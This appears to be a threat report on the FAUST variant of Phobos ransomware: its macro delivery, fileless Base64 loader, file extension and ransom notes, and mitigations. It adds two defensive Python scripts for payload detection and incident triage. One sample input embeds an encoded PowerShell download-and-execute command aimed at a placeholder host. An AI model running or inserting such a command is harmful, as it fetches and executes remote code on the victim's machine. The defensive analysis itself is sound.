FortiGuard Labs has recently discovered a new variant of the Phobos ransomware family called FAUST. This variant is particularly concerning due to its ability to maintain persistence within a network environment and efficiently encrypt files across a network.


FAUST spreads through a Microsoft Excel document that carries a Visual Basic for Applications (VBA) macro. The attack chain stores its malicious files on the Gitea service [1] [2] [3] [4] [5] [6]; the files are Base64-encoded, and the loader decodes them and injects the result directly into memory to start file encryption [2] [3] [6]. The analysis revealed a multi-stage flow that begins with execution of the VBA script and ends with deployment of the FAUST payload. The variant is notably sophisticated: the attack is fileless (the decoded payload runs from memory rather than from a file on disk), and it can persistently embed itself within a network [4].
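Because the stages described above travel as Base64 text inside a script rather than as files on disk, a useful triage step is to pull every long Base64 run out of a suspicious macro or loader, decode it, and check what it really is. The Python below is an added example written for this page, not code from FortiGuard Labs or from the malware; the loader text it scans is constructed inline (a fake PE header, a UTF-16LE encoded command, and a benign hex digest as a control) so it runs offline. The names `find_embedded_payloads`, `suspicious` and `Finding` are this example's own.

```python
import base64
import binascii
import re
from dataclasses import dataclass

# Runs of Base64 alphabet long enough to be worth decoding; the length floor
# skips ordinary identifiers and short literals.
_B64_RUN = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")


@dataclass
class Finding:
    offset: int        # position of the Base64 run in the scanned text
    encoded_len: int
    decoded_len: int
    kind: str          # "pe", "utf16-text" or "other"


def _classify(data: bytes) -> str:
    """Identify a decoded blob: a PE image, UTF-16LE text, or something else."""
    if data[:2] == b"MZ" and len(data) >= 0x40:
        e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
        if data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00":
            return "pe"
    if len(data) >= 8 and len(data) % 2 == 0:
        # PowerShell -EncodedCommand style text: printable ASCII low bytes,
        # zero high bytes.
        highs_zero = all(data[i] == 0 for i in range(1, len(data), 2))
        lows_print = all(32 <= data[i] < 127 or data[i] in (9, 10, 13)
                         for i in range(0, len(data), 2))
        if highs_zero and lows_print:
            return "utf16-text"
    return "other"


def find_embedded_payloads(text: str) -> list[Finding]:
    """Decode every long Base64 run in a script and classify the result."""
    findings = []
    for m in _B64_RUN.finditer(text):
        run = m.group(0)
        try:
            decoded = base64.b64decode(run, validate=True)
        except binascii.Error:
            continue  # bad length or padding: not real Base64, skip it
        findings.append(Finding(m.start(), len(run), len(decoded), _classify(decoded)))
    return findings


def suspicious(findings: list[Finding]) -> list[Finding]:
    """Keep only blobs that decode to executable images or encoded commands."""
    return [f for f in findings if f.kind in ("pe", "utf16-text")]


# --- constructed sample input (not a real FAUST artefact) -------------------
def _fake_pe() -> bytes:
    # DOS header: "MZ", padding, e_lfanew at 0x3C pointing to 0x40, then "PE\0\0".
    dos = b"MZ" + b"\x00" * 0x3A + (0x40).to_bytes(4, "little")
    return dos + b"PE\x00\x00" + b"\x00" * 20


SAMPLE_PE_B64 = base64.b64encode(_fake_pe()).decode()
SAMPLE_CMD_B64 = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/p')"
    .encode("utf-16le")
).decode()

# Macro-shaped loader text carrying its stages inline; the SHA-256 hex digest
# is a control: it matches the regex and decodes, but is not a payload.
SAMPLE_LOADER = f"""Sub Auto_Open()
    expected = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
    stage1 = "{SAMPLE_CMD_B64}"
    stage2 = "{SAMPLE_PE_B64}"
    Call RunInMemory(stage1, stage2)
End Sub
"""

if __name__ == "__main__":
    for f in suspicious(find_embedded_payloads(SAMPLE_LOADER)):
        print(f"offset={f.offset} kind={f.kind} decoded_len={f.decoded_len}")
```

The PE check follows the DOS-header pointer to the `PE\0\0` signature rather than trusting the `MZ` prefix alone, and the UTF-16LE check is what catches `-EncodedCommand` style stagers; a benign hex digest decodes but is classified as "other" and dropped, which keeps the false-positive rate low when the same scan is run over a whole document library.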

The Phobos ransomware family [1] [2] [3] [4] [5] [6], which includes variants such as Eking, Eight, Elbie, Devos and 8Base [1], has been used in numerous attacks since 2019 [4]. Phobos typically appends a distinctive extension to each encrypted file and demands a ransom payment in cryptocurrency [4]. FAUST appends the extension “faust” to encrypted files and drops two ransom notes, info.txt and info.hta, for negotiation [7].
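The two on-disk indicators named above, the “faust” extension and the info.txt / info.hta ransom notes, are enough for a quick scoping pass over file shares after an incident. The Python below is an added example for this page (not FortiGuard Labs code); it walks a directory tree, counts encrypted files and ransom notes per directory, and flags the tree as likely FAUST activity only when both indicators appear together. The sample directory layout it builds is constructed for the example, and the names `scan_tree`, `triage`, `build_sample_tree` and `run_sample` are this example's own.

```python
import os
import tempfile
from collections import defaultdict
from pathlib import Path

# Indicators from the write-up. The suffix check also matches the longer
# Phobos-style names (original name, an id block, the ".faust" tail).
ENCRYPTED_SUFFIX = ".faust"
RANSOM_NOTES = {"info.txt", "info.hta"}


def scan_tree(root) -> dict:
    """Walk `root` and collect encrypted-file and ransom-note counts per directory."""
    root = Path(root)
    per_dir = defaultdict(lambda: {"encrypted": 0, "total": 0, "notes": []})
    for dirpath, _dirnames, filenames in os.walk(root):
        rel = Path(dirpath).relative_to(root).as_posix()
        stats = per_dir[rel]
        for name in filenames:
            lower = name.lower()
            if lower in RANSOM_NOTES:
                stats["notes"].append(name)
                continue  # ransom notes are attacker artefacts, not user files
            stats["total"] += 1
            if lower.endswith(ENCRYPTED_SUFFIX):
                stats["encrypted"] += 1
    return dict(per_dir)


def triage(report: dict) -> dict:
    """Summarise which directories were hit and whether both indicators co-occur."""
    hit_dirs = sorted(d for d, s in report.items() if s["encrypted"] or s["notes"])
    encrypted = sum(s["encrypted"] for s in report.values())
    total = sum(s["total"] for s in report.values())
    notes = sum(len(s["notes"]) for s in report.values())
    return {
        "hit_dirs": hit_dirs,
        "encrypted_files": encrypted,
        "total_files": total,
        "ransom_notes": notes,
        # Extension alone can be a coincidence; extension plus notes is the signal.
        "likely_faust": encrypted > 0 and notes > 0,
    }


def build_sample_tree(root) -> None:
    """Constructed layout: one hit share ("finance") and one clean share ("hr")."""
    root = Path(root)
    hit = root / "finance"
    hit.mkdir(parents=True, exist_ok=True)
    for name in ("q1.xlsx.faust", "budget.docx.faust", "readme.txt"):
        (hit / name).write_bytes(b"x")
    (hit / "info.txt").write_text("ransom note placeholder")
    (hit / "info.hta").write_text("<html></html>")
    clean = root / "hr"
    clean.mkdir(exist_ok=True)
    (clean / "policy.pdf").write_bytes(b"x")


def run_sample() -> dict:
    """Build the constructed tree in a temporary directory and triage it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return triage(scan_tree(tmp))


if __name__ == "__main__":
    print(run_sample())
```

Pointing `scan_tree` at a mounted share (read-only) gives a per-directory blast radius that is useful both for deciding restore priorities and for confirming the extension and note names before they are turned into EDR or SIEM indicators.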


To mitigate FAUST and other Phobos variants, organizations have several options. They can disable VBA in Microsoft Office, or use Microsoft Defender Attack Surface Reduction (ASR) rules to block the high-risk behaviour a macro loader of this kind depends on, such as Office applications creating child processes or injecting code into other processes [5]; ASR rules can be deployed in audit mode first so that legitimate macro workflows are identified before enforcement. It is also recommended to implement advanced cybersecurity strategies, keep software updated, train employees [4], and have comprehensive security systems in place. Users should exercise caution when opening documents from untrusted sources [7]. The discovery of FAUST highlights the need for ongoing vigilance and proactive measures against evolving threats.